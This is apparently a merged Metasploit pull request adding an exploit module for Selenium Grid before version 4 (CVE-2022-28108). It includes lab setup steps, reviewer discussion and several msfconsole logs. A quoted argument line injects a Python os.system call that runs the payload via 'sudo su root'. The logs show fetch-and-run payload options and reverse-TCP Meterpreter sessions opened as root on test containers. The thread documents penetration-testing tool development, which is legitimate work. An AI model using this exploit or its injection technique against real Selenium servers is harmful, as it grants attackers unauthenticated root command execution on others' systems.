Add selenium chrome rce module (CVE-2022-28108)
rapid7/metasploit-framework pull request #19769
Opened 2024-12-26 14:48 UTC by Takahiro-Yoko

One of https://github.com/rapid7/metasploit-framework/issues/19753

## Vulnerable Application

Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types
such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.

The vulnerability affects:

    * Selenium Server (Grid) before 4

This module was successfully tested on:

    * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.0.4

### Installation

1. docker pull selenium/standalone-chrome:3.141.59

2. docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-chrome:3.141.59

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108`
4. Do: `run lhost=<lhost> rhost=<rhost>`
5. You should get a meterpreter

## Options

## Scenarios
```
msf6 > use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Expected error: unknown error: Chrome failed to start: exited normally.
  (unknown error: DevToolsActivePort file doesn't exist)
  (The process started from chrome location /usr/bin/python3 is no longer running, so ChromeDriver is assuming that Chrome has crashed.)
Build info: version: '3.141.59', revision: 'e82be7d358', time: '2018-11-14T08:25:53'
System info: host: 'e270e1bda998', ip: '172.17.0.2', os.name: 'Linux', os.arch: 'amd64', os.version: '6.8.0-51-generic', java.version: '1.8.0_292'
Driver info: driver.version: unknown
remote stacktrace: #0 0x5d0f082768f3 <unknown>
#1 0x5d0f07d5bba8 <unknown>
#2 0x5d0f07d7ee33 <unknown>
#3 0x5d0f07d7a9ef <unknown>
#4 0x5d0f07db4995 <unknown>
#5 0x5d0f07daed63 <unknown>
#6 0x5d0f07d85144 <unknown>
#7 0x5d0f07d86135 <unknown>
#8 0x5d0f082a5c3e <unknown>
#9 0x5d0f082bb6b7 <unknown>
#10 0x5d0f082a6b95 <unknown>
#11 0x5d0f082bcb05 <unknown>
#12 0x5d0f0829b2ab <unknown>
#13 0x5d0f082d7248 <unknown>
#14 0x5d0f082d73c8 <unknown>
#15 0x5d0f082f233d <unknown>
#16 0x78b06703f609 start_thread

[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:45846) at 2024-12-26 23:42:12 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

2024-12-28 03:53 UTC, bcoles commented on modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
> +    http.request(request)
Please use the `send_request_cgi` method for HTTP requests.

2024-12-28 03:53 UTC, bcoles commented on modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
> +            'args' => ["-cimport os; os.system('sudo su root -c \"#{payload.encoded}\"')"]
Presumably this will fail unless the user running Selenium can elevate to root (without a password)?

Obtaining a low-privileged shell is likely to be a more robust approach. If the user has permission to elevate privileges with passwordless sudo, the operator can elevate their session themselves.

2024-12-28 03:53 UTC, bcoles commented on modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
> +            'args' => ["-cimport os; os.system('sudo su root -c \"#{payload.encoded}\"')"]
`'` and `"` are bad characters for the payload. This could be avoided by using an additional layer of encoding, such as base64.

2024-12-28 03:53 UTC, bcoles commented on modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
> +        Opt::RPORT(4444),
Is this a default port for Selenium? If not, is there a common port for Selenium? If not, this should be removed.

2024-12-28 04:20 UTC, Takahiro-Yoko commented on modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
> +        Opt::RPORT(4444),
Port 4444 is the default port for Selenium Grid, so I'll leave it as it is. Thanks!

2024-12-28 05:10 UTC, Takahiro-Yoko commented on modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
> +    http.request(request)
Thanks! Updated to use `send_request_cgi`. https://github.com/rapid7/metasploit-framework/pull/19769/commits/6c5952d3b6b5563c47657c04c2f85974cc2e5163

2024-12-28 05:24 UTC, Takahiro-Yoko commented on modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
> +            'args' => ["-cimport os; os.system('sudo su root -c \"#{payload.encoded}\"')"]
Thanks!

When using this exploit against the official Selenium Docker image, we need to elevate to root (which can be done without a password) for the exploit to succeed. The normal seluser may not have the necessary permissions to execute the payload. However, this isn't always the case, so I added a check to determine whether the user can elevate to root without a password. https://github.com/rapid7/metasploit-framework/pull/19769/commits/9bfccc429316c7b075f929a39ede5d4d1775bc75 Does this approach seem acceptable?

2024-12-28 05:37 UTC, bcoles commented on modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
> +    Exploit::CheckCode::Appears
```suggestion
    CheckCode::Appears("Version #{version} detected, which is vulnerable")
```

2024-12-28 05:37 UTC, bcoles commented on modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
> +    })
Does the server send a response? If so, the typical code pattern here is to use something like this:

```ruby
res = send_request_cgi(...)
fail_with(Failure::Unreachable, 'Connection failed') unless res
fail_with(Failure::UnexpectedReply, 'The target did not respond with 200 OK') unless res&.code == 200
fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server') unless res&.body.to_s.include?('something we expected')
```

2024-12-28 06:10 UTC, Takahiro-Yoko commented on modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
> +    })
Thanks! The message varies between versions, so I chose the first one. https://github.com/rapid7/metasploit-framework/pull/19769/commits/6577a18abb355a307fb6c6a45fdd3b79cf25ea94

2025-01-03 15:05 UTC, dledda-r7 requested changes
Hello @Takahiro-Yoko, Thanks for your module!
I've left couple of comments for some minor code changes.
The exploit works great!

```
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > show options

Module options (exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.ht
                                       ml
   RPORT    4444             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ihlWIMji         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > set lport 4445
lport => 4445
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > set rhost 172.26.172.131
rhost => 172.26.172.131
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > set lhost 172.26.172.131
lhost => 172.26.172.131
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > exploit
[*] Started reverse TCP handler on 172.26.172.131:4445 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
[*] Meterpreter session 1 opened (172.26.172.131:4445 -> 172.17.0.2:34320) at 2025-01-03 09:56:34 -0500

meterpreter > 
```

2025-01-04 00:15 UTC, Takahiro-Yoko commented on modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
> +    end
Thanks! Updated to avoid the code nesting. https://github.com/rapid7/metasploit-framework/pull/19769/commits/6cbb30c91a742e8e763c54c3a7230057f334b34c

2025-01-04 00:28 UTC, Takahiro-Yoko commented
Thank you for reviewing! I've applied your suggestions, updated the check to avoid code nesting, and retested.
<details>
  <summary>selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.04</summary>

```
msf6 > use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > options

Module options (exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    4444             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
   FETCH_FILENAME      mjnNZDCnzidH     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4451
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:35202) at 2025-01-04 09:22:30 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
</details>
<details>
  <summary>selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04</summary>

```
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4452
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Selenium Grid version 4.x detected.
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:55048) at 2025-01-04 09:25:55 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.3
OS           : Ubuntu 18.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
</details>

2025-01-06 14:03 UTC, dledda-r7 approved these changes
Looks good! Thanks @Takahiro-Yoko!

```
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > exploit
[*] Started reverse TCP handler on 172.22.186.63:4445 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
[*] Meterpreter session 1 opened (172.22.186.63:4445 -> 172.17.0.2:49588) at 2025-01-06 07:55:06 -0500

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 20.04 (Linux 6.11.2-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 
```

2025-01-07 09:49 UTC, dledda-r7 commented
@Takahiro-Yoko, FYI I just removed the PAYLOAD set from the DefaultOptions, it was working fine with the automatic selection from Metasploit but noted that you tested with that one!
I think we are set for landing! 😄

2025-01-07 10:10 UTC, merged

2025-01-07 12:52 UTC, dledda-r7 commented
# Release Notes
This adds an exploit module for Selenium Server (Grid) allowing unauthenticated command injection.